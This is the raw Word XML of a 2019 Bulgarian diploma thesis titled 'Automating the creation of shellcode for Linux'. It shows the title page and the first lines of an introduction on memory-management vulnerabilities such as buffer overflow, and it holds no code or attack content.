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22A1" w:rsidRPr="00112660" w:rsidRDefault="00112660">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ТЕХНОЛОГИЧНО УЧИЛИЩЕ ЕЛЕКТРОННИ СИСТЕМИ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00112660">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>към ТЕХНИЧЕСКИ УНИВЕРСИТЕТ - СОФИЯ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00112660">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>ДИПЛОМНА  РАБОТА</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00112660">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Тема: Автоматизиране на създаването на “shellcode” за Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00112660">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00112660">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Дипломант:</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>Научен ръководител:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00112660">
      <w:pPr>
        <w:spacing w:before="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     Боян Каратотев</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">       доц. д-р Александър Цокев</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00112660">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>СОФИЯ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00CC22A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="00112660">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9">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6150B9" w:rsidRDefault="006150B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00112660">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00B829C8" w:rsidRDefault="00112660" w:rsidP="00B829C8">
      <w:pPr>
        <w:pStyle w:val="Fakeheading"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_72a5sxma2rkb" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="1" w:name="_Toc3540744"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00B829C8">
        <w:lastRenderedPageBreak/>
        <w:t>Увод</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00112660" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>В днешно време технологични</w:t>
      </w:r>
      <w:r w:rsidR="00B5799F">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>те</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> пропуски в софтуера са едни от най-обсъжданите теми, а грешки</w:t>
      </w:r>
      <w:r w:rsidR="00B5799F">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>те</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> свързани с управлението на паметта са едни от най-опасните за сигурността на една система. </w:t>
      </w:r>
      <w:r w:rsidR="004B2072">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>Такива слабости са</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> неизбежн</w:t>
      </w:r>
      <w:r w:rsidR="004B2072">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> заради сложността на съвременните системи</w:t>
      </w:r>
      <w:r w:rsidR="00B5799F">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">, а ръчното управление </w:t>
      </w:r>
      <w:r w:rsidR="006F0F40">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">на системите </w:t>
      </w:r>
      <w:r w:rsidR="00B5799F">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>само увеличава риска от проблеми</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00112660" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Един такъв пропуск е препълване</w:t>
      </w:r>
      <w:r w:rsidR="006F0F40">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>то</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
